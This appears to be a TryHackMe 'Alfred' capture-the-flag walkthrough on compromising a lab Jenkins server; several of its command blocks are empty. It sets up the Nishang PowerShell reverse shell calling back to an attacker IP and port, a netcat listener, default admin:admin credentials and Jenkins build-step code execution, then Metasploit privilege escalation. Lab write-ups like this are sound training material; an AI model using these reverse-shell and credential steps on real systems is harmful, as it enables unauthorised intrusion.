Alfred

Room Link: https://tryhackme.com/room/alfredarrow-up-right

Initial Access

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1arrow-up-right

Edit the file and add the following to the end of the file. This is just to make it a bit easier when we use it later.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.135.134 -Port 4444

How many ports are open? (TCP only)

nmap -A 10.10.98.134

What is the username and password for the log in panel(in the format username:password)

admin:admin

Getting shell

Kali

rlwrap nc -lvnp 4444

Jenkins

Under Build add a build step and select 'Execute Windows batch command' then add the following in the command field

Switching Shells

Kali

Kali

Victim

Privilege Escalation

Victim (Metasploit)

We are now NT Authority

Migrating processes to make sure we have correct permissions for the privileged user. The safest process to pick is the services.exe process

Last updated